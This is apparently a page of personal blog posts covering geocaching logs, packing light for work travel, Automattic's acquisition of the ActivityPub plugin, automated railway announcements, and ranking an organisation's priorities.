  • Cem, Level 4 Dragonslayer, smashing doors and bugs alike
  • Lae, Level 7 Pirate, seabound rogue with eyes on the horizon
  • Kyle, Level 5 Apprentice Bard, master of words and magic
  • Simran, Level 6 Apprentice Code Witch, weaving spells from nature

I think that’s pretty awesome.

Footnotes

1 Also: I don’t own any of the expansion packs and playing with the same cards over and over again gets a bit samey.

2 The “levels” are simply the number of years each teammate has been an Automattician, plus one.

In front of the Colosseum in Rome, Dan - wearing a rainbow-striped bandana atop which his sunglasses are perched - takes a selfie. Behind him stand a man with dark hair and a closely-trimmed beard wearing a purple "woo" t-shirt, a woman with long brown hair wearing beads and a multicoloured dress, a man wearing spectacles and a dark t-shirt on which the number "23" can be made out, and a man in sunglasses with a ginger beard, wearing an open blue shirt.× A deck of Dixit cards, bound by a twisted elastic band, sits on a flight itinerary for the journey "LGW to FCO" taking place on May 21, 2023 and costing $367.60.× A trio of Dixit cards within a grid of nine. From left to right, they show: a heart, on fire, beneath a glass jar; a cubbyhole containing childrens' toys; a fairy leaping from a book towards a small person atop a stack of books.× Partial screenshot from a document entitled "Team Fire". The visible part is titled "Who we are (identity)" and reads:We are a band of brave adventurers who bring light into the wild forests of Extend. We tame the monsters who lurk in the dungeons beneath the Castle of Vendor Experience. The beasts we keep at bay include: PBS, which helps ensure code quality and extension standards compliance; the Vendor Dashboard, haunt of third-party developers, as well as their documentation and analytics platforms; Integrations with Payments Admin, to ensure that treasure is shared, and other tools.×

Dan Q found GC7FB9H From Canterbury to the cache

This checkin to GC7FB9H From Canterbury to the cache reflects a geocaching.com log entry. See more of Dan's cache logs.

Well that was quite the adventure!

The first wayoint is right across the road from where some work colleagues and I are staying for an “away week”. I decided to dash out during a break in the weather to try and solve this multi between meetings. But I was quickly confused because… this isn’t the way I was taught to do Roman numerals. I’d always been told that you should never have four of the same letter in a row, e.g. you should say XIV, not XIIII. Once I’d worked out what I was doing wrong, though, I was okay!

The second and third waypoints had me braving some frankly scary roads. The drivers here just don’t seem to stop unless you’re super assertive when you step out!

Once I had the final numbers and ran it through geochecker I realised that the cache must be very close to where I’d had lunch earlier today! Once I got there it took me a while to get to the right floor, after which the hint made things pretty obvious.

Great trail, really loved it. And just barely made it back before the rain really started hammering down. TFTC, FP awarded, and greetings from Oxford, UK!

Dan holding an orange mint tin in a city centre.

Dan holding an orange mint tin in a city centre.×

Dan Q found GC9QCKH When in Rome live as the Romans do (bb Tribute 05)

This checkin to GC9QCKH When in Rome live as the Romans do (bb Tribute 05) reflects a geocaching.com log entry. See more of Dan's cache logs.

Took until the fourth hiding place before I found the cache. Out for a walk with work colleagues on the way to dinner. Greetings from Oxfordshire, UK!

Alongside the River Tiber, with a wide-arched stone bridge in the background, Dan sits on a wall and waves to the camera.

Alongside the River Tiber, with a wide-arched stone bridge in the background, Dan sits on a wall and waves to the camera.×

Travelling light

Now that travel for work is back on the menu, I’ve been trying to upgrade my “pack light” game.

I’ve been inspired in part by Beau, who I first met during my trip to South Africa in 2019 during my Automattic onboarding. Beau travelled from the US for a two week jaunt with nothing but hand luggage, and it blew my mind.

A modest-sized backpack in blue and yellow, with a WordPress logo stiched on, sits on an airport departure lounge bench. Alongside it is a burgundy-coloured British passport.
Gotta flight? Pack light, pack tight. That’s right! Corporate branding is just a bonus.

For my trip to Vienna earlier this year for a divisional meetup, I got by with just a backpack and a laptop bag. Right now, I’m waiting to fly to Rome for a week, and I’ve ditched the laptop bag in favour of just a single carry-on backpack. About 7kg of luggage, and well within the overhead locker size limit.

I’m absolutely sold on this approach. I get to:

  • walk past the queues for luggage drop (having checked-in online),
  • keep the entirety of my luggage with me at all times (which ensures it goes where I do),
  • breeze through security1, thanks to smart packing2
  • walk right out of the airport at the other end without having to wait for the flingers to finish smashing everybody’s luggage into the carousels.
Minimalist carbon fibre wallet, balanced on two fingertips, with parts of a Halifax Mastercard credit card showing from behind an elasticated band.
I’ve been working on simplifying my everyday carry, too. My wallet is the Carbon Fibre Liquid Wallet, which is about the size of a deck of playing cards (something I also often carry!) and holds a handful of cards, a bundle of cash, a bottle opener, and all my regular keys. The hook on the end is for attaching the pendrive with my password safe for travel.

As somebody who’s travelled “heavy” for most of my life – and especially since the children came along – it’s liberating to migrate to a “pick up a bag and go” mindset. To begin with, the nagging thought that I must’ve forgotten something essential was challenging, but I think I’ve gotten past that stage now.

Travelling light feels like carefree: like being a kid again, when all you needed was the back on your back and you were ready for an adventure. Once again, I’ve got a bag on my back3 and I know that everything I need for an adventure is right here with me4.

Footnotes

1 If you’ve travelled with me before, you might have noticed that I sometimes have trouble at borders on account of my damn stupid name, as predicted by the Passport Office. I’ve since learned all the requisite tricks to sidestep these problems, but that’s probably worthy of a post in its own right.

2 A little smart packing goes a long way. In the photo above, you might see my pre-prepared liquids bag in a side pocket, my laptop slides right out for separate scanning, my wallet and phone just dump out of my pockets, and I’m done.

3 I don’t really have a bag on my back right now. I’m sat in a depature lounge at Gatwick Airport. But you get the idea.

4 Do I really have everything I need? I’ve not brought a waterproof coat and, looking at the weather forecast at my destination, this might have been a mistake. But worst case I can buy a cheap poncho at the other end. That’s the kind of freedom that being an adult gets you, replacing the childlike freedom to get soaked and not care.

A modest-sized backpack in blue and yellow, with a WordPress logo stiched on, sits on an airport departure lounge bench. Alongside it is a burgundy-coloured British passport.× Minimalist carbon fibre wallet, balanced on two fingertips, with parts of a Halifax Mastercard credit card showing from behind an elasticated band.×

Automattic Acquires ActivityPub Plugin for WordPress

This article is a repost promoting content originally published elsewhere. See more things Dan's reposted.

Automattic has acquired the ActivityPub plugin for WordPress from German developer Matthias Pfefferle, who will be joining the company to continue improving support for federated platforms. Pfefferle, who is also the author of the Webmention plugin, said his new role is to see how Automattic’s products can benefit from open protocols like ActivityPub.

This is so exciting I might burst. Want to know why?

  1. Matt Mullenweg‘s commitment to ActivityPub makes me happy. WordPress made Pingback and Trackback take off, back in the day, and I believe that – in the same way – Automattic can help make ActivityPub more accessible and mainstream too.
  2. Matthias Pfefferle is both an IndieWeb and an ActivityPub star; I use (and I’ve extented upon) a lot of code he’s written every day and I sponsor him on Github! The chance that we get to work directly together is pretty slim, but it’s a chance right?

Susan A. Kitchens expressed concern that this could increase the level of ActivityPub spam out there (which right now is very low). I worry about that too. But I’m still optimistic that we can make something awesome off the back of this acquisition and keep the interpersonal Web federated, the way it ought to be.

Announcers and Automation

Nowadays if you’re on a railway station and hear an announcement, it’s usually a computer stitching together samples1. But back in the day, there used to be a human with a Tannoy microphone sitting in the back office, telling you about the platform alternations and destinations.

I had a friend who did it as a summer job, once. For years afterwards, he had a party trick that I always quite enjoyed: you’d say the name of a terminus station on a direct line from Preston, e.g. Edinburgh Waverley, and he’d respond in his announcer-voice: “calling at Lancaster, Oxenholme the Lake District, Penrith, Carlisle, Lockerbie, Haymarket, and Edinburgh Waverley”, listing all of the stops on that route. It was a quirky, beautiful, and unusual talent. Amazingly, when he came to re-apply for his job the next summer he didn’t get it, which I always thought was a shame because he clearly deserved it: he could do the job blindfold!

There was a strange transitional period during which we had machines to do these announcements, but they weren’t that bright. Years later I found myself on Haymarket station waiting for the next train after mine had been cancelled, when a robot voice came on to announce a platform alteration: the train to Glasgow would now be departing from platform 2, rather than platform 1. A crowd of people stood up and shuffled their way over the footbridge to the opposite side of the tracks. A minute or so later, a human announcer apologised for the inconvenience but explained that the train would be leaving from platform 1, and to disregard the previous announcement. Between then and the train’s arrival the computer tried twice more to send everybody to the wrong platform, leading to a back-and-forth argument between the machine and the human somewhat reminiscient of the white zone/red zone scene from Airplane! It was funny perhaps only because I wasn’t among the people whose train was in superposition.

Clearly even by then we’d reached the point where the machine was well-established and it was easier to openly argue with it than to dig out the manual and work out how to turn it off. Nowadays it’s probably even moreso, but hopefully they’re less error-prone.

The "Mercado de Abasto" (central wholesale fruit and vegetable market) of Rosario, Argentina, 1931. Horses with carts work alongide automobiles and an omnibus.

When people talk about how technological unemployment, they focus on the big changes, like how a tipping point with self-driving vehicles might one day revolutionise the haulage industry… along with the social upheaval that comes along with forcing a career change on millions of drivers.

But in the real world, automation and technological change comes in salami slices. Horses and carts were seen alongside the automobile for decades. And you still find stations with human announcers. Even the most radically-disruptive developments don’t revolutionise the world overnight. Change is inevitable, but with preparation, we can be ready for it.

Footnotes

1 Like ScotRail’s set, voiced by Alison McKay, which computers can even remix for you over a low-fi hiphop beat if you like.

Bisect your Priority of Constituencies

Your product, service, or organisation almost certainly has a priority of constituencies, even if it’s not written down or otherwise formally-encoded. A famous example would be that expressed in the Web Platform Design Principles. It dictates how you decide between two competing needs, all other things being equal.

At Three Rings, for example, our priority of constituencies might1 look like this:

  1. The needs of volunteers are more important than
  2. The needs of voluntary organisations, which are more important than
  3. Continuation of the Three Rings service, which is more important than
  4. Adherance to technical standards and best practice, which is more important than
  5. Development of new features

These are all things we care about, but we’re talking about where we might choose to rank them, relative to one another.

Semicircular illustration showing five facets of growing relative importance. From least to most, they are: new features, standards-compliance, service continuity, organisation needs, volunteer needs.
The priorities and constituencies portrayed in this illustration are ficticious. Any resemblence to real priorities and constituencies, whether living or dead, is entirely coincidental.

The priorities of an organisation you’re involved with won’t be the same: perhaps it includes shareholders, regulatory compliance, different kinds of end-users, employees, profits, different measures of social good, or various measurable outputs. That’s fine: every system is different.

But what I’d challenge you to do is find ways to bisect your priorities. Invent scenarios that pit each constituency against itself another and discuss how they should be prioritised, all other things being equal.

Using the example above, I might ask “which is more important?” in each category:

  1. The needs of the volunteers developing Three Rings, or the needs of the volunteers who use it?
  2. The needs of organisations that currently use the system, or the needs of organisations that are considering using it?
  3. Achieving a high level of uptime, or promptly installing system updates?
  4. Compliance with standards as-written, or maximum compatibility with devices as-used?
  5. Implementation of new features that are the most popular user requests, or those which provide the biggest impact-to-effort payoff?
Illustrated priority list from above, which each item split into two and re-named such that they are, from least to most important: popular features, impact features, compliance, usability, uptime, updates, future clients, current clients, other volunteers, our volunteers.
These might not be your answers to the same questions. They’re not even necessarily mine, and they’re even less-likely to be representative of Three Rings CIC. It’s just illustrative.

The aim of the exercise isn’t to come up with a set of commandments for your company. If you come up with something you can codify, that’s great, but if you and your stakeholders just use it as an exercise in understanding the relative importance of different goals, that’s great too. Finding where people disagree is more-important than having a unifying creed2.

And of course this exercise applicable to more than just organisational priorities. Use it for projects or standards. Use it for systems where you’re the only participant, as a thought exercise. A priority of constituencies can be a beautiful thing, but you can understand it better if you’re willing to take it apart once in a while. Bisect your priorities, and see what you find.

Footnotes

1 Three Rings doesn’t have an explicit priority of constituencies: the example I give is based on my own interpretation, but I’m only a small part of the organisation.

2 Having a creed is awesome too, though, as I’ve said before.